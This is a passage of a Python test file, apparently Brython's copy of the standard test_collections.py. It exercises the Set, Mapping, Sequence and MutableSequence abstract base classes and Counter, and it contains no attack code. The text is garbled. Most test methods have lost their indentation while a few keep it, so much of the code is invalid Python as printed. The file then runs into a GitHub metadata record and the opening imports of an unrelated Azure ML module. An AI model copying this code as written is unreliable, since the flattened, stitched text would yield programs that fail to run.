s3 = MySet((3, 4))
s4 = MySet((3, 4))
self.assertTrue(s2 > s1)
self.assertTrue(s1 < s2)
self.assertFalse(s2 <= s1)
self.assertFalse(s2 <= s3)
self.assertFalse(s1 >= s2)
self.assertEqual(s3, s4)
self.assertNotEqual(s2, s3)
def test_arithmetic_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1, 2, 3))
s2 = MySet((3, 4, 5))
s3 = s1 & s2
self.assertEqual(s3, MySet((3,)))
def test_MutableSet(self):
self.assertIsInstance(set(), MutableSet)
self.assertTrue(issubclass(set, MutableSet))
self.assertNotIsInstance(frozenset(), MutableSet)
self.assertFalse(issubclass(frozenset, MutableSet))
self.validate_abstract_methods(MutableSet, '__contains__', '__iter__', '__len__',
'add', 'discard')
def test_issue_5647(self):
# MutableSet.__iand__ mutated the set during iteration
s = WithSet('abcd')
s &= WithSet('cdef') # This used to fail
self.assertEqual(set(s), set('cd'))
    def test_issue_4920(self):
        """MutableSet.pop() works on a slotted, name-mangled implementation."""
        class MySet(MutableSet):
            __slots__=['__s']
            def __init__(self,items=None):
                if items is None:
                    items=[]
                self.__s=set(items)
            def __contains__(self,v):
                return v in self.__s
            def __iter__(self):
                return iter(self.__s)
            def __len__(self):
                return len(self.__s)
            def add(self,v):
                result=v not in self.__s
                self.__s.add(v)
                return result
            def discard(self,v):
                result=v in self.__s
                self.__s.discard(v)
                return result
            def __repr__(self):
                return "MySet(%s)" % repr(list(self))
        items = [5,43,2,1]
        s = MySet(items)
        r = s.pop()
        # pop() must remove and return exactly one of the original items.
        self.assertEqual(len(s), len(items) - 1)
        self.assertNotIn(r, s)
        self.assertIn(r, items)
def test_issue8750(self):
empty = WithSet()
full = WithSet(range(10))
s = WithSet(full)
s -= s
self.assertEqual(s, empty)
s = WithSet(full)
s ^= s
self.assertEqual(s, empty)
s = WithSet(full)
s &= s
self.assertEqual(s, full)
s |= s
self.assertEqual(s, full)
def test_issue16373(self):
# Recursion error comparing comparable and noncomparable
# Set instances
class MyComparableSet(Set):
def __contains__(self, x):
return False
def __len__(self):
return 0
def __iter__(self):
return iter([])
class MyNonComparableSet(Set):
def __contains__(self, x):
return False
def __len__(self):
return 0
def __iter__(self):
return iter([])
def __le__(self, x):
return NotImplemented
def __lt__(self, x):
return NotImplemented
cs = MyComparableSet()
ncs = MyNonComparableSet()
self.assertFalse(ncs < cs)
self.assertTrue(ncs <= cs)
self.assertFalse(ncs > cs)
self.assertTrue(ncs >= cs)
    def test_issue26915(self):
        """Container membership test should check identity first (NaN-safe)."""
        class CustomSequence(Sequence):
            def __init__(self, seq):
                self._seq = seq
            def __getitem__(self, index):
                return self._seq[index]
            def __len__(self):
                return len(self._seq)
        # nan != nan, so only an identity pre-check lets it be found.
        nan = float('nan')
        obj = support.NEVER_EQ
        seq = CustomSequence([nan, obj, nan])
        containers = [
            seq,
            ItemsView({1: nan, 2: obj}),
            ValuesView({1: nan, 2: obj})
        ]
        for container in containers:
            for elem in container:
                self.assertIn(elem, container)
        self.assertEqual(seq.index(nan), 0)
        self.assertEqual(seq.index(obj), 1)
        self.assertEqual(seq.count(nan), 2)
        self.assertEqual(seq.count(obj), 1)
    def assertSameSet(self, s1, s2):
        """Assert that two arbitrary iterables contain the same elements."""
        # coerce both to a real set then check equality
        self.assertSetEqual(set(s1), set(s2))
def test_Set_from_iterable(self):
"""Verify _from_iterable overridden to an instance method works."""
class SetUsingInstanceFromIterable(MutableSet):
def __init__(self, values, created_by):
if not created_by:
raise ValueError(f'created_by must be specified')
self.created_by = created_by
self._values = set(values)
def _from_iterable(self, values):
return type(self)(values, 'from_iterable')
def __contains__(self, value):
return value in self._values
def __iter__(self):
yield from self._values
def __len__(self):
return len(self._values)
def add(self, value):
self._values.add(value)
def discard(self, value):
self._values.discard(value)
impl = SetUsingInstanceFromIterable([1, 2, 3], 'test')
actual = impl - {1}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({2, 3}, actual)
actual = impl | {4}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({1, 2, 3, 4}, actual)
actual = impl & {2}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({2}, actual)
actual = impl ^ {3, 4}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({1, 2, 4}, actual)
# NOTE: ixor'ing with a list is important here: internally, __ixor__
# only calls _from_iterable if the other value isn't already a Set.
impl ^= [3, 4]
self.assertIsInstance(impl, SetUsingInstanceFromIterable)
self.assertEqual('test', impl.created_by)
self.assertEqual({1, 2, 4}, impl)
def test_Set_interoperability_with_real_sets(self):
# Issue: 8743
class ListSet(Set):
def __init__(self, elements=()):
self.data = []
for elem in elements:
if elem not in self.data:
self.data.append(elem)
def __contains__(self, elem):
return elem in self.data
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
return 'Set({!r})'.format(self.data)
r1 = set('abc')
r2 = set('bcd')
r3 = set('abcde')
f1 = ListSet('abc')
f2 = ListSet('bcd')
f3 = ListSet('abcde')
l1 = list('abccba')
l2 = list('bcddcb')
l3 = list('abcdeedcba')
target = r1 & r2
self.assertSameSet(f1 & f2, target)
self.assertSameSet(f1 & r2, target)
self.assertSameSet(r2 & f1, target)
self.assertSameSet(f1 & l2, target)
target = r1 | r2
self.assertSameSet(f1 | f2, target)
self.assertSameSet(f1 | r2, target)
self.assertSameSet(r2 | f1, target)
self.assertSameSet(f1 | l2, target)
fwd_target = r1 - r2
rev_target = r2 - r1
self.assertSameSet(f1 - f2, fwd_target)
self.assertSameSet(f2 - f1, rev_target)
self.assertSameSet(f1 - r2, fwd_target)
self.assertSameSet(f2 - r1, rev_target)
self.assertSameSet(r1 - f2, fwd_target)
self.assertSameSet(r2 - f1, rev_target)
self.assertSameSet(f1 - l2, fwd_target)
self.assertSameSet(f2 - l1, rev_target)
target = r1 ^ r2
self.assertSameSet(f1 ^ f2, target)
self.assertSameSet(f1 ^ r2, target)
self.assertSameSet(r2 ^ f1, target)
self.assertSameSet(f1 ^ l2, target)
# Don't change the following to use assertLess or other
# "more specific" unittest assertions. The current
# assertTrue/assertFalse style makes the pattern of test
# case combinations clear and allows us to know for sure
# the exact operator being invoked.
# proper subset
self.assertTrue(f1 < f3)
self.assertFalse(f1 < f1)
self.assertFalse(f1 < f2)
self.assertTrue(r1 < f3)
self.assertFalse(r1 < f1)
self.assertFalse(r1 < f2)
self.assertTrue(r1 < r3)
self.assertFalse(r1 < r1)
self.assertFalse(r1 < r2)
with self.assertRaises(TypeError):
f1 < l3
with self.assertRaises(TypeError):
f1 < l1
with self.assertRaises(TypeError):
f1 < l2
# any subset
self.assertTrue(f1 <= f3)
self.assertTrue(f1 <= f1)
self.assertFalse(f1 <= f2)
self.assertTrue(r1 <= f3)
self.assertTrue(r1 <= f1)
self.assertFalse(r1 <= f2)
self.assertTrue(r1 <= r3)
self.assertTrue(r1 <= r1)
self.assertFalse(r1 <= r2)
with self.assertRaises(TypeError):
f1 <= l3
with self.assertRaises(TypeError):
f1 <= l1
with self.assertRaises(TypeError):
f1 <= l2
# proper superset
self.assertTrue(f3 > f1)
self.assertFalse(f1 > f1)
self.assertFalse(f2 > f1)
self.assertTrue(r3 > r1)
self.assertFalse(f1 > r1)
self.assertFalse(f2 > r1)
self.assertTrue(r3 > r1)
self.assertFalse(r1 > r1)
self.assertFalse(r2 > r1)
with self.assertRaises(TypeError):
f1 > l3
with self.assertRaises(TypeError):
f1 > l1
with self.assertRaises(TypeError):
f1 > l2
# any superset
self.assertTrue(f3 >= f1)
self.assertTrue(f1 >= f1)
self.assertFalse(f2 >= f1)
self.assertTrue(r3 >= r1)
self.assertTrue(f1 >= r1)
self.assertFalse(f2 >= r1)
self.assertTrue(r3 >= r1)
self.assertTrue(r1 >= r1)
self.assertFalse(r2 >= r1)
with self.assertRaises(TypeError):
f1 >= l3
with self.assertRaises(TypeError):
f1 >=l1
with self.assertRaises(TypeError):
f1 >= l2
# equality
self.assertTrue(f1 == f1)
self.assertTrue(r1 == f1)
self.assertTrue(f1 == r1)
self.assertFalse(f1 == f3)
self.assertFalse(r1 == f3)
self.assertFalse(f1 == r3)
self.assertFalse(f1 == l3)
self.assertFalse(f1 == l1)
self.assertFalse(f1 == l2)
# inequality
self.assertFalse(f1 != f1)
self.assertFalse(r1 != f1)
self.assertFalse(f1 != r1)
self.assertTrue(f1 != f3)
self.assertTrue(r1 != f3)
self.assertTrue(f1 != r3)
self.assertTrue(f1 != l3)
self.assertTrue(f1 != l1)
self.assertTrue(f1 != l2)
def test_Set_hash_matches_frozenset(self):
    """Set._hash() must return the same value as the built-in frozenset
    hash for a wide variety of contents (empty, singletons, negatives,
    floats, NaN, nested frozensets, large ranges near sys.maxsize)."""
    sets = [
        # NOTE(review): the first literal is an empty *dict*, not a set;
        # frozenset({}) still yields the empty frozenset, so the case holds.
        {}, {1}, {None}, {-1}, {0.0}, {"abc"}, {1, 2, 3},
        {10**100, 10**101}, {"a", "b", "ab", ""}, {False, True},
        {object(), object(), object()}, {float("nan")}, {frozenset()},
        {*range(1000)}, {*range(1000)} - {100, 200, 300},
        {*range(sys.maxsize - 10, sys.maxsize + 10)},
    ]
    for s in sets:
        fs = frozenset(s)
        self.assertEqual(hash(fs), Set._hash(fs), msg=s)
def test_Mapping(self):
    """dict registers as a Mapping; a minimal concrete Mapping supports
    comparison but, being unordered, rejects reversed()."""
    for sample in [dict]:
        self.assertIsInstance(sample(), Mapping)
        self.assertTrue(issubclass(sample, Mapping))
    self.validate_abstract_methods(Mapping, '__contains__', '__iter__', '__len__',
                                   '__getitem__')

    class MyMapping(Mapping):
        # Minimal concrete Mapping: always empty, lookups always fail.
        def __len__(self):
            return 0

        def __getitem__(self, i):
            raise IndexError

        def __iter__(self):
            return iter(())

    self.validate_comparison(MyMapping())
    # Mappings have no defined reverse order.
    self.assertRaises(TypeError, reversed, MyMapping())
def test_MutableMapping(self):
    """dict satisfies MutableMapping, and the ABC declares the expected
    abstract methods."""
    samples = [dict]
    for cls in samples:
        instance = cls()
        self.assertIsInstance(instance, MutableMapping)
        self.assertTrue(issubclass(cls, MutableMapping))
    abstract_names = ('__contains__', '__iter__', '__len__',
                      '__getitem__', '__setitem__', '__delitem__')
    self.validate_abstract_methods(MutableMapping, *abstract_names)
def test_MutableMapping_subclass(self):
    """Views of a MutableMapping subclass (UserDict) support set
    operations, and the result of a set operation is a snapshot that is
    not affected by later mutation of the mapping.  (Test issue 9214.)"""
    mymap = UserDict()
    mymap['red'] = 5
    self.assertIsInstance(mymap.keys(), Set)
    self.assertIsInstance(mymap.keys(), KeysView)
    self.assertIsInstance(mymap.items(), Set)
    self.assertIsInstance(mymap.items(), ItemsView)

    mymap = UserDict()
    mymap['red'] = 5
    z = mymap.keys() | {'orange'}
    self.assertIsInstance(z, set)
    list(z)
    mymap['blue'] = 7  # Shouldn't affect 'z'
    self.assertEqual(sorted(z), ['orange', 'red'])

    mymap = UserDict()
    mymap['red'] = 5
    z = mymap.items() | {('orange', 3)}
    self.assertIsInstance(z, set)
    list(z)
    mymap['blue'] = 7  # Shouldn't affect 'z'
    self.assertEqual(z, {('orange', 3), ('red', 5)})
def test_Sequence(self):
    """All built-in sequence types (including range and memoryview)
    register as Sequence."""
    for cls in (tuple, list, bytes, str):
        self.assertIsInstance(cls(), Sequence)
        self.assertTrue(issubclass(cls, Sequence))
    self.assertIsInstance(range(10), Sequence)
    self.assertTrue(issubclass(range, Sequence))
    self.assertIsInstance(memoryview(b""), Sequence)
    self.assertTrue(issubclass(memoryview, Sequence))
    self.assertTrue(issubclass(str, Sequence))
    self.validate_abstract_methods(
        Sequence, '__contains__', '__iter__', '__len__', '__getitem__')
def test_Sequence_mixins(self):
    """Sequence.index() mixin must agree with native list.index() and
    str.index() for every (letter, start, stop) combination, including
    missing letters and out-of-range start/stop values."""
    class SequenceSubclass(Sequence):
        # Minimal concrete Sequence wrapping an arbitrary sequence; the
        # index() implementation is inherited from the mixin under test.
        def __init__(self, seq=()):
            self.seq = seq

        def __getitem__(self, index):
            return self.seq[index]

        def __len__(self):
            return len(self.seq)

    # Compare Sequence.index() behavior to (list|str).index() behavior
    def assert_index_same(seq1, seq2, index_args):
        try:
            expected = seq1.index(*index_args)
        except ValueError:
            # Native raised ValueError: the mixin must raise too.
            with self.assertRaises(ValueError):
                seq2.index(*index_args)
        else:
            actual = seq2.index(*index_args)
            self.assertEqual(
                actual, expected, '%r.index%s' % (seq1, index_args))

    for ty in list, str:
        nativeseq = ty('abracadabra')
        indexes = [-10000, -9999] + list(range(-3, len(nativeseq) + 3))
        seqseq = SequenceSubclass(nativeseq)
        for letter in set(nativeseq) | {'z'}:
            assert_index_same(nativeseq, seqseq, (letter,))
            for start in range(-3, len(nativeseq) + 3):
                assert_index_same(nativeseq, seqseq, (letter, start))
                for stop in range(-3, len(nativeseq) + 3):
                    assert_index_same(
                        nativeseq, seqseq, (letter, start, stop))
def test_ByteString(self):
    """bytes and bytearray are ByteStrings; str, list, tuple and
    memoryview are not."""
    for good in (bytes, bytearray):
        self.assertIsInstance(good(), ByteString)
        self.assertTrue(issubclass(good, ByteString))
    for bad in (str, list, tuple):
        self.assertNotIsInstance(bad(), ByteString)
        self.assertFalse(issubclass(bad, ByteString))
    view = memoryview(b"")
    self.assertNotIsInstance(view, ByteString)
    self.assertFalse(issubclass(memoryview, ByteString))
def test_MutableSequence(self):
    """Immutable sequences are rejected by MutableSequence; list,
    bytearray and deque are accepted."""
    for immutable_cls in (tuple, str, bytes):
        self.assertNotIsInstance(immutable_cls(), MutableSequence)
        self.assertFalse(issubclass(immutable_cls, MutableSequence))
    for mutable_cls in (list, bytearray, deque):
        self.assertIsInstance(mutable_cls(), MutableSequence)
        self.assertTrue(issubclass(mutable_cls, MutableSequence))
    self.assertFalse(issubclass(str, MutableSequence))
    self.validate_abstract_methods(
        MutableSequence, '__contains__', '__iter__', '__len__',
        '__getitem__', '__setitem__', '__delitem__', 'insert')
def test_MutableSequence_mixins(self):
    """Exercise every MutableSequence mixin method (append, extend,
    reverse, pop, remove, +=, clear) through a minimal concrete
    subclass, including the issue-34427 self-extension case."""
    # Test the mixins of MutableSequence by creating a minimal concrete
    # class inherited from it.
    class MutableSequenceSubclass(MutableSequence):
        def __init__(self):
            self.lst = []

        def __setitem__(self, index, value):
            self.lst[index] = value

        def __getitem__(self, index):
            return self.lst[index]

        def __len__(self):
            return len(self.lst)

        def __delitem__(self, index):
            del self.lst[index]

        def insert(self, index, value):
            self.lst.insert(index, value)

    mss = MutableSequenceSubclass()
    mss.append(0)
    mss.extend((1, 2, 3, 4))
    self.assertEqual(len(mss), 5)
    self.assertEqual(mss[3], 3)
    mss.reverse()
    self.assertEqual(mss[3], 1)
    mss.pop()
    self.assertEqual(len(mss), 4)
    mss.remove(3)
    self.assertEqual(len(mss), 3)
    mss += (10, 20, 30)
    self.assertEqual(len(mss), 6)
    self.assertEqual(mss[-1], 30)
    mss.clear()
    self.assertEqual(len(mss), 0)

    # issue 34427
    # extending self should not cause infinite loop
    items = 'ABCD'
    mss2 = MutableSequenceSubclass()
    mss2.extend(items + items)
    mss.clear()
    mss.extend(items)
    mss.extend(mss)
    self.assertEqual(len(mss), len(mss2))
    self.assertEqual(list(mss), list(mss2))
def test_illegal_patma_flags(self):
    """A class cannot claim to be both a Sequence and a Mapping for
    structural pattern matching: combining both tp flags must raise."""
    with self.assertRaises(TypeError):
        class Both(Collection):
            __abc_tpflags__ = (Sequence.__flags__ | Mapping.__flags__)
################################################################################
### Counter
################################################################################
class CounterSubclassWithSetItem(Counter):
    """Counter subclass that records whether __setitem__ was invoked.

    Used to verify that element counting falls back to the general
    (pure Python) path when __setitem__ is overridden.
    """

    def __init__(self, *args, **kwargs):
        # Reset the flag *before* counting starts: the base initializer
        # triggers __setitem__ once per distinct element.
        self.called = False
        super().__init__(*args, **kwargs)

    def __setitem__(self, key, value):
        self.called = True
        super().__setitem__(key, value)
class CounterSubclassWithGet(Counter):
    """Counter subclass that records whether get() was invoked.

    Used to verify that element counting falls back to the general
    (pure Python) path when get() is overridden.
    """

    def __init__(self, *args, **kwargs):
        # Flag must exist before counting begins, since the base
        # initializer may call our get() for each element.
        self.called = False
        super().__init__(*args, **kwargs)

    def get(self, key, default):
        self.called = True
        return super().get(key, default)
class TestCounter(unittest.TestCase):
def test_basics(self):
c = Counter('abcaba')
self.assertEqual(c, Counter({'a':3 , 'b': 2, 'c': 1}))
self.assertEqual(c, Counter(a=3, b=2, c=1))
self.assertIsInstance(c, dict)
self.assertIsInstance(c, Mapping)
self.assertTrue(issubclass(Counter, dict))
self.assertTrue(issubclass(Counter, Mapping))
self.assertEqual(len(c), 3)
self.assertEqual(sum(c.values()), 6)
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.keys()), ['a', 'b', 'c'])
self.assertEqual(list(c), ['a', 'b', 'c'])
self.assertEqual(list(c.items()),
[('a', 3), ('b', 2), ('c', 1)])
self.assertEqual(c['b'], 2)
self.assertEqual(c['z'], 0)
self.assertEqual(c.__contains__('c'), True)
self.assertEqual(c.__contains__('z'), False)
self.assertEqual(c.get('b', 10), 2)
self.assertEqual(c.get('z', 10), 10)
self.assertEqual(c, dict(a=3, b=2, c=1))
self.assertEqual(repr(c), "Counter({'a': 3, 'b': 2, 'c': 1})")
self.assertEqual(c.most_common(), [('a', 3), ('b', 2), ('c', 1)])
for i in range(5):
self.assertEqual(c.most_common(i),
[('a', 3), ('b', 2), ('c', 1)][:i])
self.assertEqual(''.join(c.elements()), 'aaabbc')
c['a'] += 1 # increment an existing value
c['b'] -= 2 # sub existing value to zero
del c['c'] # remove an entry
del c['c'] # make sure that del doesn't raise KeyError
c['d'] -= 2 # sub from a missing value
c['e'] = -5 # directly assign a missing value
c['f'] += 4 # add to a missing value
self.assertEqual(c, dict(a=4, b=0, d=-2, e=-5, f=4))
self.assertEqual(''.join(c.elements()), 'aaaaffff')
self.assertEqual(c.pop('f'), 4)
self.assertNotIn('f', c)
for i in range(3):
elem, cnt = c.popitem()
self.assertNotIn(elem, c)
c.clear()
self.assertEqual(c, {})
self.assertEqual(repr(c), 'Counter()')
self.assertRaises(NotImplementedError, Counter.fromkeys, 'abc')
self.assertRaises(TypeError, hash, c)
c.update(dict(a=5, b=3))
c.update(c=1)
c.update(Counter('a' * 50 + 'b' * 30))
c.update() # test case with no args
c.__init__('a' * 500 + 'b' * 300)
c.__init__('cdc')
c.__init__()
self.assertEqual(c, dict(a=555, b=333, c=3, d=1))
self.assertEqual(c.setdefault('d', 5), 1)
self.assertEqual(c['d'], 1)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(c['e'], 5)
def test_init(self):
self.assertEqual(list(Counter(self=42).items()), [('self', 42)])
self.assertEqual(list(Counter(iterable=42).items()), [('iterable', 42)])
self.assertEqual(list(Counter(iterable=None).items()), [('iterable', None)])
self.assertRaises(TypeError, Counter, 42)
self.assertRaises(TypeError, Counter, (), ())
self.assertRaises(TypeError, Counter.__init__)
def test_total(self):
c = Counter(a=10, b=5, c=0)
self.assertEqual(c.total(), 15)
def test_order_preservation(self):
# Input order dictates items() order
self.assertEqual(list(Counter('abracadabra').items()),
[('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)])
# letters with same count: ^----------^ ^---------^
# Verify retention of order even when all counts are equal
self.assertEqual(list(Counter('xyzpdqqdpzyx').items()),
[('x', 2), ('y', 2), ('z', 2), ('p', 2), ('d', 2), ('q', 2)])
# Input order dictates elements() order
self.assertEqual(list(Counter('abracadabra simsalabim').elements()),
['a', 'a', 'a', 'a', 'a', 'a', 'a', 'b', 'b', 'b','r',
'r', 'c', 'd', ' ', 's', 's', 'i', 'i', 'm', 'm', 'l'])
# Math operations order first by the order encountered in the left
# operand and then by the order encountered in the right operand.
ps = 'aaabbcdddeefggghhijjjkkl'
qs = 'abbcccdeefffhkkllllmmnno'
order = {letter: i for i, letter in enumerate(dict.fromkeys(ps + qs))}
def correctly_ordered(seq):
'Return true if the letters occur in the expected order'
positions = [order[letter] for letter in seq]
return positions == sorted(positions)
p, q = Counter(ps), Counter(qs)
self.assertTrue(correctly_ordered(+p))
self.assertTrue(correctly_ordered(-p))
self.assertTrue(correctly_ordered(p + q))
self.assertTrue(correctly_ordered(p - q))
self.assertTrue(correctly_ordered(p | q))
self.assertTrue(correctly_ordered(p & q))
p, q = Counter(ps), Counter(qs)
p += q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p -= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p |= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p &= q
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p.update(q)
self.assertTrue(correctly_ordered(p))
p, q = Counter(ps), Counter(qs)
p.subtract(q)
self.assertTrue(correctly_ordered(p))
def test_update(self):
c = Counter()
c.update(self=42)
self.assertEqual(list(c.items()), [('self', 42)])
c = Counter()
c.update(iterable=42)
self.assertEqual(list(c.items()), [('iterable', 42)])
c = Counter()
c.update(iterable=None)
self.assertEqual(list(c.items()), [('iterable', None)])
self.assertRaises(TypeError, Counter().update, 42)
self.assertRaises(TypeError, Counter().update, {}, {})
self.assertRaises(TypeError, Counter.update)
def test_copying(self):
# Check that counters are copyable, deepcopyable, picklable, and
#have a repr/eval round-trip
words = Counter('which witch had which witches wrist watch'.split())
def check(dup):
msg = "\ncopy: %s\nwords: %s" % (dup, words)
self.assertIsNot(dup, words, msg)
self.assertEqual(dup, words)
check(words.copy())
check(copy.copy(words))
check(copy.deepcopy(words))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
check(pickle.loads(pickle.dumps(words, proto)))
check(eval(repr(words)))
update_test = Counter()
update_test.update(words)
check(update_test)
check(Counter(words))
def test_copy_subclass(self):
class MyCounter(Counter):
pass
c = MyCounter('slartibartfast')
d = c.copy()
self.assertEqual(d, c)
self.assertEqual(len(d), len(c))
self.assertEqual(type(d), type(c))
def test_conversions(self):
# Convert to: set, list, dict
s = 'she sells sea shells by the sea shore'
self.assertEqual(sorted(Counter(s).elements()), sorted(s))
self.assertEqual(sorted(Counter(s)), sorted(set(s)))
self.assertEqual(dict(Counter(s)), dict(Counter(s).items()))
self.assertEqual(set(Counter(s)), set(s))
def test_invariant_for_the_in_operator(self):
c = Counter(a=10, b=-2, c=0)
for elem in c:
self.assertTrue(elem in c)
self.assertIn(elem, c)
def test_multiset_operations(self):
# Verify that adding a zero counter will strip zeros and negatives
c = Counter(a=10, b=-2, c=0) + Counter()
self.assertEqual(dict(c), dict(a=10))
elements = 'abcd'
for i in range(1000):
# test random pairs of multisets
p = Counter(dict((elem, randrange(-2,4)) for elem in elements))
p.update(e=1, f=-1, g=0)
q = Counter(dict((elem, randrange(-2,4)) for elem in elements))
q.update(h=1, i=-1, j=0)
for counterop, numberop in [
(Counter.__add__, lambda x, y: max(0, x+y)),
(Counter.__sub__, lambda x, y: max(0, x-y)),
(Counter.__or__, lambda x, y: max(0,x,y)),
(Counter.__and__, lambda x, y: max(0, min(x,y))),
]:
result = counterop(p, q)
for x in elements:
self.assertEqual(numberop(p[x], q[x]), result[x],
(counterop, x, p, q))
# verify that results exclude non-positive counts
self.assertTrue(x>0 for x in result.values())
elements = 'abcdef'
for i in range(100):
# verify that random multisets with no repeats are exactly like sets
p = Counter(dict((elem, randrange(0, 2)) for elem in elements))
q = Counter(dict((elem, randrange(0, 2)) for elem in elements))
for counterop, setop in [
(Counter.__sub__, set.__sub__),
(Counter.__or__, set.__or__),
(Counter.__and__, set.__and__),
]:
counter_result = counterop(p, q)
set_result = setop(set(p.elements()), set(q.elements()))
self.assertEqual(counter_result, dict.fromkeys(set_result, 1))
def test_inplace_operations(self):
elements = 'abcd'
for i in range(1000):
# test random pairs of multisets
p = Counter(dict((elem, randrange(-2,4)) for elem in elements))
p.update(e=1, f=-1, g=0)
q = Counter(dict((elem, randrange(-2,4)) for elem in elements))
q.update(h=1, i=-1, j=0)
for inplace_op, regular_op in [
(Counter.__iadd__, Counter.__add__),
(Counter.__isub__, Counter.__sub__),
(Counter.__ior__, Counter.__or__),
(Counter.__iand__, Counter.__and__),
]:
c = p.copy()
c_id = id(c)
regular_result = regular_op(c, q)
inplace_result = inplace_op(c, q)
self.assertEqual(inplace_result, regular_result)
self.assertEqual(id(inplace_result), c_id)
def test_subtract(self):
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
c.subtract(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50)
self.assertEqual(c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50))
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
c.subtract(Counter(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50))
self.assertEqual(c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50))
c = Counter('aaabbcd')
c.subtract('aaaabbcce')
self.assertEqual(c, Counter(a=-1, b=0, c=-1, d=1, e=-1))
c = Counter()
c.subtract(self=42)
self.assertEqual(list(c.items()), [('self', -42)])
c = Counter()
c.subtract(iterable=42)
self.assertEqual(list(c.items()), [('iterable', -42)])
self.assertRaises(TypeError, Counter().subtract, 42)
self.assertRaises(TypeError, Counter().subtract, {}, {})
self.assertRaises(TypeError, Counter.subtract)
def test_unary(self):
c = Counter(a=-5, b=0, c=5, d=10, e=15,g=40)
self.assertEqual(dict(+c), dict(c=5, d=10, e=15, g=40))
self.assertEqual(dict(-c), dict(a=5))
def test_repr_nonsortable(self):
c = Counter(a=2, b=None)
r = repr(c)
self.assertIn("'a': 2", r)
self.assertIn("'b': None", r)
def test_helper_function(self):
# two paths, one for real dicts and one for other mappings
elems = list('abracadabra')
d = dict()
_count_elements(d, elems)
self.assertEqual(d, {'a': 5, 'r': 2, 'b': 2, 'c': 1, 'd': 1})
m = OrderedDict()
_count_elements(m, elems)
self.assertEqual(m,
OrderedDict([('a', 5), ('b', 2), ('r', 2), ('c', 1), ('d', 1)]))
# test fidelity to the pure python version
c = CounterSubclassWithSetItem('abracadabra')
self.assertTrue(c.called)
self.assertEqual(dict(c), {'a': 5, 'b': 2, 'c': 1, 'd': 1, 'r':2 })
c = CounterSubclassWithGet('abracadabra')
self.assertTrue(c.called)
self.assertEqual(dict(c), {'a': 5, 'b': 2, 'c': 1, 'd': 1, 'r':2 })
def test_multiset_operations_equivalent_to_set_operations(self):
# When the multiplicities are all zero or one, multiset operations
# are guaranteed to be equivalent to the corresponding operations
# for regular sets.
s = list(product(('a', 'b', 'c'), range(2)))
powerset = chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
counters = [Counter(dict(groups)) for groups in powerset]
for cp, cq in product(counters, repeat=2):
sp = set(cp.elements())
sq = set(cq.elements())
self.assertEqual(set(cp + cq), sp | sq)
self.assertEqual(set(cp - cq), sp - sq)
self.assertEqual(set(cp | cq), sp | sq)
self.assertEqual(set(cp & cq), sp & sq)
self.assertEqual(cp == cq, sp == sq)
self.assertEqual(cp != cq, sp != sq)
self.assertEqual(cp <= cq, sp <= sq)
self.assertEqual(cp >= cq, sp >= sq)
self.assertEqual(cp < cq, sp < sq)
self.assertEqual(cp > cq, sp > sq)
def test_eq(self):
self.assertEqual(Counter(a=3, b=2, c=0), Counter('ababa'))
self.assertNotEqual(Counter(a=3, b=2), Counter('babab'))
def test_le(self):
self.assertTrue(Counter(a=3, b=2, c=0) <= Counter('ababa'))
self.assertFalse(Counter(a=3, b=2) <= Counter('babab'))
def test_lt(self):
self.assertTrue(Counter(a=3, b=1, c=0) < Counter('ababa'))
self.assertFalse(Counter(a=3, b=2, c=0) < Counter('ababa'))
def test_ge(self):
self.assertTrue(Counter(a=2, b=1, c=0) >= Counter('aab'))
self.assertFalse(Counter(a=3, b=2, c=0) >= Counter('aabd'))
def test_gt(self):
self.assertTrue(Counter(a=3, b=2, c=0) > Counter('aab'))
self.assertFalse(Counter(a=2, b=1, c=0) > Counter('aab'))
def load_tests(loader, tests, pattern):
    """unittest load_tests protocol hook: also run the doctests embedded
    in the collections module's docstrings alongside the unit tests."""
    tests.addTest(doctest.DocTestSuite(collections))
    return tests
# Run the full test suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
|
{
"content_hash": "7cb65650f7db561f5a6d7d20e32a7ef9",
"timestamp": "",
"source": "github",
"line_count": 2375,
"max_line_length": 107,
"avg_line_length": 39.654315789473685,
"alnum_prop": 0.5315303836311704,
"repo_name": "brython-dev/brython",
"id": "fa1d0e014dee923f0f3539a31375b95db9225f1f",
"size": "94179",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "www/src/Lib/test/test_collections.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "24308"
},
{
"name": "HTML",
"bytes": "5144999"
},
{
"name": "JavaScript",
"bytes": "4143100"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "22236375"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
from pathlib import Path
from typing import Dict, Optional
from azure.ai.ml._restclient.v2022_10_01_preview.models import ComputeResource
from azure.ai.ml._restclient.v2022_10_01_preview.models import VirtualMachine as VMResource
